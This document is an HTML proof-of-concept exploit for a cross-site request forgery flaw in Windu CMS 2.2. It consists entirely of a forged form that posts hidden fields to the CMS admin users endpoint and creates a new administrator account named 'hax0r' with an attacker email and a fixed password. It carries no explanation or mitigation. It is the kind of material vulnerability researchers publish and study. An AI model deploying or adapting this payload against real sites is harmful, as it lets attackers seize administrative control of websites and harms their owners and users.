&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Windu CMS 2.2 CSRF Add Admin Exploit&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;&lt;center&gt;&lt;br /&gt;
&lt;form method=&quot;POST&quot; action=&quot;http://www.example.com/winducms/admin/users/?mn=admin.message.error&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;type&quot; value=&quot;9&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;evil@hacker.net&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;0bl1viON&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;passwordCompare&quot; value=&quot;0bl1viON&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;hax0r&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;name&quot; value=&quot;XSRF&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;surname&quot; value=&quot;PoC&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;form_key&quot; value=&quot;addUserSystem&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;Forge!&quot; /&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
